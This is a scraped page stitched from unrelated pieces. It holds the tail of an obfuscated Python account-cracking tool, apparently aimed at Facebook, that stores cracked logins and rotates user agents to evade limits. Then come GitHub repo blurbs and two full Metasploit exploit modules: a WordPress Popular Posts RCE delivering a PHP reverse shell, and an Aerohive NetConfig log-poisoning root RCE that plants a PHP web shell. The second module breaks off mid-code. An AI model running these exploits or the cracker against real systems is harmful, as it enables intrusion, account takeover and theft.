ppp = _ahmar_ahmar_("OK/%s"%(files)).read().splitlines() del1 = ("%s"%(files)).replace("-", " ").replace(".txt", "") _ahmae_cici_('\n%s[%s•%s] %sTotal Crack Result Date %s Is %s Account'%(_U_,_P_,_U_,_P_,del1,len(ppp))) except: _ahmar_cici_('%s[%s No Results Found %s]'%(_M_,_P_,_M_)) elif ch in ['2','02','002','b']: try: cpl = os.listdir("CP") _ahmar_cici_('\n%s[%s Crack Results Stored in CP Files %s]\n'%(_U_,_P_,_U_)) for file in cpl: _ahmar_cici_('%s[%s•%s] %s%s'%(_U_,_P_,_U_,_P_,file)) _ahmar_cici_('') files = _cici_ahmar_('%s[%s•%s] %sInput File Name : '%(_U_,_P_,_U_,_P_)) _ahmar_cici_('') if files == "": _ahmar_cici_('%s[%s!%s] %sWrong input'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) os.system('cat CP/%s'%(files)) ppp = _ahmar_ahmar_("CP/%s"%(files)).read().splitlines() del1 = ("%s"%(files)).replace("-", " ").replace(".txt", "") _ahmar_cici_('\n%s[%s•%s] %sTotal Crack Result Date %s Is %s Account'%(_U_,_P_,_U_,_P_,del1,len(ppp))) except: _ahmar_cici_('%s[%s No Results Found %s]'%(_M_,_P_,_M_)) else: _ahmar_cici_('%s[%s!%s] %sWeong Input'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) _cici_ahmar_('\n%s[ %sReturn %s]%s'%(_U_,_P_,_U_,_P_)) _menu_dev_(_Ahmar_jan_Cici_) ### Mau Recode Lu Ya? def _check_recode_(_oscylopsce_,_ascylapsci_,_escylipsce_): _recode_ = '__My_Love__'+_oscylopsce_+_escylipsce_+_ascylapsci_+'__Forever__' if _uscylupsci_ not in _recode_:_ahmar_cici_('%s[%s!%s] %sHey, do you want to recode?'%(_M_,_P_,_M_,_P_)) else:return _menu_dev_(_recode_) ### Menu User Agent def _default_ua_(_Cici_Cantik_Banget_): ua = ua_xiaomi try: ugent = _ahmar_ahmar_('ugent.txt','w') ugent.write(ua) ugent.close() except (KeyError,IOError): _login_dev_(_Cici_Cantik_Banget_) def _ugen_dev_(_Ahmar_jan_Cici_): _var_ugen_(_Ahmar_jan_Cici_) pmu = _cici_ahmar_('%s[%s•%s] %sChoose : '%(_U_,_P_,_U_,_P_)) _ahmar_cici_('') if pmu in[""]: _ahmar_cici_('%s[%s!%s] %sWrong input'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) elif pmu in ['1','01','001','a']: os.system('xdg-_ahmar_ahmar_ https://www.google.com/search?q=My+User+Agent&oq=My+User+Agent&aqs=chrome..69i57j0l3j0i22i30l6.4674j0j1&sourceid=chrome&ie=UTF-8') _cici_ahmar_('%s[ %sRetrun %s]%s'%(_U_,_P_,_U_,_P_)) _menu_dev_(_Ahmar_jan_Cici_) elif pmu in ['2','02','002','b']: _del_() ua = _cici_ahmar_("%s[%s•%s] %sInput User agent : \n\n"%(_U_,_P_,_U_,_P_)) try: ugent = _ahmar_ahmar_('ugent.txt','w') ugent.write(ua) ugent.close() _ahmar_cici_("\n%s[ %sSuccessfully Changed User Agent %s]"%(_U_,_P_,_U_)) _cici_ahmar_('\n%s[ %sEnter Click %s]%s'%(_U_,_P_,_U_,_P_)) _menu_dev_(_Ahmar_jan_Cici_) except (KeyError,IOError): _ahmar_cici_("\n%s[ %sFailed to Change User Agent %s]"%(_M_,_P_,_M_)) _cici_ahmar_('\n%s[ %sRetrun %s]%s'%(_M_,_P_,_M_,_P_)) _menu_dev_(_Ahmar_jan_Cici_) elif pmu in ['3','03','003','c']: _ugen_hp_(_Ahmar_jan_Cici_) elif pmu in ['4','04','004','d']: _del_() _ahmar_cici_("%s[ %sUser Agent Deleted Successfully %s]"%(_U_,_P_,_U_)) _cici_ahmar_('\n%s[ %sRetrun %s]%s'%(_U_,_P_,_U_,_P_)) _menu_dev_(_Ahmar_jan_Cici_) elif pmu in ['5','05','005','e']: try: ungser = _ahmar_ahmar_('ugent.txt', 'r').read() except (KeyError,IOError): ungser = 'Not found' _ahmar_cici_("%s[%s•%s] %sYour User Agent : \n\n%s%s"%(_U_,_P_,_U_,_P_,_U_,ungser)) _ahmar_cici_("\n%s[ %sThis is your current user agent %s]"%(_U_,_P_,_U_)) _cici_ahmar_('\n%s[ %sRetrun %s]%s'%(_U_,_P_,_U_,_P_)) _menu_dev_(_Ahmar_jan_Cici_) elif pmu in ['0','00','000','f']: _menu_dev_(_Ahmar_jan_Cici_) else: _ahmar_cici_('%s[%s!%s] %sWrong Input BRO'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) def _ugen_hp_(_Ahmar_jan_Cici_): _del_() _shmar_cici_('%s[%s1%s] %sXiaomi'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s2%s] %sNokia'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s3%s] %sAsus'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s4%s] %sHuawei'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s5%s] %sVivo'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s6%s] %sOppo'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s7%s] %sSamsung'%(_U_,_P_,_U_,_P_)) _ahmar_cici_('%s[%s8%s] %sWindows'%(_U_,_P_,_U_,_P_)) pc = _cici_ahmar_('%s[%s•%s] %sChoose : '%(_U_,_P_,_U_,_P_)) _dapunta_cici_('') if pc in['']: _dapunta_cici_('%s[%s!%s] %sWrong Input Bro'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) elif pc in ['1','01']: ugent = _ahmar_ahmar_('ugent.txt','w');ugent.write(ua_xiaomi);ugent.close() elif pc in ['2','02']: ugent = _ahmar_ahmar_('ugent.txt','w');ugent.write(ua_nokia);ugent.close() elif pc in ['3','03']: ugent = _ahmar_ahmar_('ugent.txt','w');ugent.write(ua_asus);ugent.close() elif pc in ['4','04']: ugent = _ahmar_ahmar_('ugent.txt','w');ugent.write(ua_huawei);ugent.close() elif pc in ['5','05']: ugent = _ahmar_ahmar_('ugent.txt','w');ugent.write(ua_vivo);ugent.close() elif pc in ['6','06']: ugent = _ahmar_ahmar_('ugent.txt','w');ugent.write(ua_oppo);ugent.close() elif pc in ['7','07']: ugent = _ahmar_ahmar_('ugent.txt','w');ugent.write(ua_samsung);ugent.close() elif pc in ['8','08']: ugent = _ahmar_ahmar_('ugent.txt','w');ugent.write(ua_windows);ugent.close() else: _ahmar_cici_('%s[%s!%s] %sWrong input'%(_M_,_P_,_M_,_P_)) time.sleep(2) _menu_dev_(_Ahmar_jan_Cici_) _ahmar_cici_("%s[ %sSuccessfully Changed User Agent %s]"%(_U_,_P_,_U_)) _cici_ahmar_('\n%s[ %sEnter Click %s]%s'%(_U_,_P_,_U_,_P_)) _menu_dev_(_Ahmar_jan_Cici_) ### Tampilan User Agent def _var_ugen_(_Ahmar_jan_Cici_): _dapunta_cici_("%s[%s1%s] %sBest User Agent"%(_U_,_P_,_U_,_P_)) _Ahmat_cici_("%s[%s2%s] %sChange User Agent %s[%sManual%s]"%(_U_,_P_,_U_,_P_,_U_,_P_,_U_)) _Ahmar_cici_("%s[%s3%s] %sChange User agent %s[%sAdjust HP%s]"%(_U_,_P_,_U_,_P_,_U_,_P_,_U_)) _Ahmar_cici_("%s[%s4%s] %sDelete User Agent"%(_U_,_P_,_U_,_P_)) _Ahmar_cici_("%s[%s5%s] %sChek User Agent"%(_U_,_P_,_U_,_P_)) _Ahmar_cici_("%s[%s0%s] %sRetrun"%(_U_,_P_,_U_,_P_)) ### Tampilan Metode def start_method(): _Ahmar_cici_('\n%s[%s1%s] %sMetode Api'%(_U_,_P_,_U_,_P_)) _Ahmar_cici_('%s[%s2%s] %sMetode Mbasic'%(_U_,_P_,_U_,_P_)) ### Tampilan Mulai Crack def started(): _Ahmar_cici_('%s[%s•%s] %sCrack is Running...'%(_U_,_P_,_U_,_P_)) _Ahmar_cici_('%s[%s•%s] %sAccount [OK] Saved To OK/%s.txt'%(_U_,_P_,_U_,_P_,tanggal)) _Ahmar_cici_('%s[%s•%s] %sAccount [CP] Saved To CP/%s.txt'%(_U_,_P_,_U_,_P_,tanggal)) _Ahmar_cici_('%s[%s•%s] %sUse Flight Mode [5 Seconds Only] Every 5 Minutes\n'%(_U_,_P_,_U_,_P_)) ### Start if __name__=='__main__': os.system('git pull') _clear_() _folder_() _check_recode_(_oscylopsce_,_ascylapsci_,_escylipsce_) # _Ahmar_cici_('%s[%s•%s] %s'%(_U_,_P_,_U_,_P_)) # _Ahmar_cici_('%s[%s!%s] %s'%(_M_,_P_,_M_,_P_))
joni2back / Php Classic:dart: PHP libraries to be used as helpers in any project - Curl, Error handler, Autoloader, Ftp, Shell, Exception, Console, etc
tigusigalpa / Coinmarketcap PhpModern PHP 8.1+ client for CoinMarketCap API v1. Seamless Laravel integration with Facade support, PSR-18 HTTP abstraction, comprehensive error handling, and type-safe DTOs. Access real-time cryptocurrency prices, market data, exchange info, and historical quotes. Perfect for building crypto portfolios, trading bots, and blockchain analytics.
Nate0634034090 / Nate158g M W N L P D A O E### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless 